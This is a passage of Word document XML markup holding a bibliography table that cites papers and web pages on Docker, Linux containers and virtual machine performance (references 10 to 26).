                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7B247892" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[10] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="41326C5B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">M. Moravcik, P. Segec, M. Kontsek and e. el, “Comparison of LXC and Docker Technologies,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">ICETA 2020 - 18th IEEE International Conference on Emerging eLearning Technologies and Applications, Proceedings, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 481-486, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4F4CD90D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5DEE3F3B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[11] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="17FC90D4" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Q. Zhang, L. Liu, C. Pu and e. al, “A Comparative Study of Containers and Virtual Machines in Big Data Environment,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">IEEE International Conference on Cloud Computing, CLOUD, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Vols. 2018-July, pp. 178-185, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="600AD2DF" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="522F9EDD" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[12] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="07EE67A5" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Joy, “Performance comparison between Linux containers and virtual machines,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Conference Proceeding - 2015 International Conference on Advances in Computer Engineering and Applications, ICACEA 2015, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 342-346, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1F98DEB0" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1A489C1E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[13] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6E99DBF9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">X. Xie, P. Wang and Q. Wang, “The performance analysis of Docker and rkt based on Kubernetes,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">ICNC-FSKD 2017 - 13th International Conference on Natural Computation, Fuzzy Systems and Knowledge Discovery, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 2137-2141, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="58DD630C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="46A3C9E6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[14] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="14854CBB" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">B. Rad, H. J. Bhatti and M. Ahmadi, “An Introduction to Docker and Analysis of its Performance,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">ITCSNS International Journal of Computer Science and Network Security, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 17, no. 3, pp. 228-235, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2705F38E" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="402D9748" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[15] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3011696B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. M. Potdar, S. Kengond and M. Mulla, “Perfromance evaluation of docker container and virtual machine,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Procedia Computer Science, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 171, pp. 1419-1428, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3B234B9C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2A5D6594" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[16] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5C0EB42F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker, “Docker Overview,” docker, [Online]. Available: https://docs.docker.com/get-started/overview/. [Accessed 19 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="166DBF79" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="54188606" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[17] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4BDA72AA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">V. Tuomas, “Advantages of docker,” 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="46004CA8" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0B574506" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[18] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2DFFB645" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">V. Sharma, H. K. Saxena and A. K. Singh, “Docker for Multi-containers web application,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2nd International Conference on Innovative Mechanisms for Industry Applications, ICIMIA 2020 - Conference Proceedings, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 589-592, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="781AA00C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1489AFD6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[19] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="012B6050" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>O. Nachmani, “5 Key Benefits of Docker: CI, Version Control, Portability, Isolation and Security,” DZone, 19 April 2020. [Online]. Available: https://dzone.com/articles/5-key-benefits-docker-ci. [Accessed 19 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="35CE4439" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="307AD509" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[20] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="734B9634" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Sitaram and S. Paktar, “Study of Container Technology with Docker,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Journal of Advanced Research in Science, Communication and Technology (IJARSCT), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 5, no. 2, pp. 504-509, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="7143DFAB" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="451C17F2" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[21] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="61CF8590" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. S. Harji, P. Buhr and T. Brecht, “Our troubles with Linux Kernel upgrades and why you should care,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">ACM SIGOPS Operating system Review, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 47, no. 2, pp. 66-72, 2013. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="725B675C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="53E894B6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[22] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1C9DF20C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Singh and N. Singh, “Containers &amp; Docker: Emerging roles &amp; future of Cloud technology,” in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Proceedings of the 2016 2nd International Conference on Applied and Theoretical Computing and Communication Technology, iCATccT 2016</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, Bangalore, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="533405F5" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="37992CAF" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[23] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0A53FD95" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">F. Špaček, R. Sohlich and D. T, “Docker as Platform for Assignments Evaluation,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Procedia Engineering, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 100, pp. 1665-1671, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="49E0506A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0DD57720" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[24] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5147C869" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker, “Docker overview | Docker Documentation,” docker, [Online]. Available: https://docs.docker.com/get-started/overview/. [Accessed 20 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0A046368" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3D79DE68" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[25] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="075604D7" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Nüst, V. Sochat, B. Marwick and et.al, “Ten simple rules for writing Dockerfiles for reproducible data science,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">PLOS Computational Biology, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 16, no. 11, p. e1008316, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5EF27BDA" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="65664234" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[26] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1F06B24A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">C. Zheng, L. Rupprecht, V. Tarasov and et.al, “Wharf: Sharing Docker Images in a Distributed File System,” in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Proceeding of the ACM Symposium on Cloud Computing</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
